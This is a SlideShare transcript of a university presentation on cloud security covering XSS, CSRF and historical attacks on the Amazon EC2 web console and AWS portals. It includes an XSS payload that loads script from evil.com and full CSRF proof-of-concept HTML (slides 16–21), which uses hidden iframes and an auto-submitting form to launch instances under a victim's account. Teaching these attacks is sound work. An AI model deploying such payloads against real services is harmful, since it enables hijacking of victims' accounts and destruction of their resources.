• Save
Cloud Insecurity
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Cloud Insecurity

on

  • 2,904 views

A short presentation for a university class.

A short presentation for a university class.

Statistics

Views

Total Views
2,904
Views on SlideShare
2,898
Embed Views
6

Actions

Likes
0
Downloads
0
Comments
0

2 Embeds 6

http://www.linkedin.com 5
https://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Cloud Insecurity Presentation Transcript

  • 1. Marco Arena
  • 2. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 3. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 4. Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
  • 5. Recalls • XSS, a simple example: <c:if test=“${param.sayHello}”> Server-Side JSP Hello ${param.name}! </c:if> Evil parameter: %3Cscript%20src%3D%22Dhttp%3A//evil.com/evil.js%22%3E%3C /script%3E Result: Hello <script src=“http://evil.com/evil.js”></script>
  • 6. Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
  • 7. Recalls • CSRF, a simple example: ... <img src=“http://truste Trusted blog (i.e. MySpace) dblog.com/addfrien d.php?id=12345”/> ... Active session User Evil Site
  • 8. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 9. Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
  • 10. Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
  • 11. Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
  • 12. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 13. Amazon EC2 real vulnerabilities • The security of AMI instances depends on the web management console for security. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
  • 14. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 15. Web management console vulnerabilities • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account. • Two parts: – Initialize an evil AMI; – Launch the instance under the victim’s EC2 account.
  • 16. Web management console vulnerabilities initialize.html: <html> <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  • 17. Web management console vulnerabilities initialize.html: Cross-Domain <html> Image Tag <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  • 18. Web management console vulnerabilities launch.html: <html> <body> <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST"> <input type="hidden" name="action.MinCount" value="1" /> <input type="hidden" name="action.InstanceType" value="m1.small" /> <input type="hidden" name="action.SecurityGroup" value="default" /> <input type="hidden" name="action.SecurityGroup" value="Webserver" /> <input type="hidden" name="action.MaxCount" value="1000000" /> <input type="hidden" name="action.ImageId" value="ami-00031337" /> <input type="hidden" name="mbtc" value="50084" /> <input type="hidden" name="region" value="us-east-1" /> </form> <script> setTimeout("document.LaunchEvilAMI.submit()",5000); </script> </body> </html>
  • 19. Web management console vulnerabilities
  • 20. Web management console vulnerabilities Merge: <html> <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  • 21. Web management console vulnerabilities Merge: The browser will not display the reply of <html> the web server. <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  • 22. Web management console vulnerabilities • The second vulnerability terminates arbitrary AMIs being run by the victim. • After the attack is launched, the victim can see that the instance was terminated without her consent.
  • 23. Web management console vulnerabilities • The last vulnerability involves the deletion of AMI key pairs. • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
  • 24. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 25. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates
  • 26. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates.
  • 27. AWS portals vulnerabilities • The first attack against AWS generates a new access key for the EC2 user’s session. • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account. • The attacker can create a temporary denial of service as the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
  • 28. AWS portals vulnerabilities • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user. • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
  • 29. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 30. Conclusions • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users. • But it does not magically protect application logic from abuse or prevent attacks against the application level.
  • 31. Conclusions • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines. • Cloud providers must fix their security bugs and perform an incessant code review.
  • 32. References • Hacking: the Next Generation Nitesh Dhanjani, Billy Rios, and Brett Hardin. O’Reilly, 2009. • Hacking Exposed: Web 2.0 Rich Cannings, Himanshu Dwivedi, Zane Lackey. Mc-Graw Hill, 2008 • Secure Programming with Static Analysis Brian Chess, Jacob West. Addison-Wesley, 2007.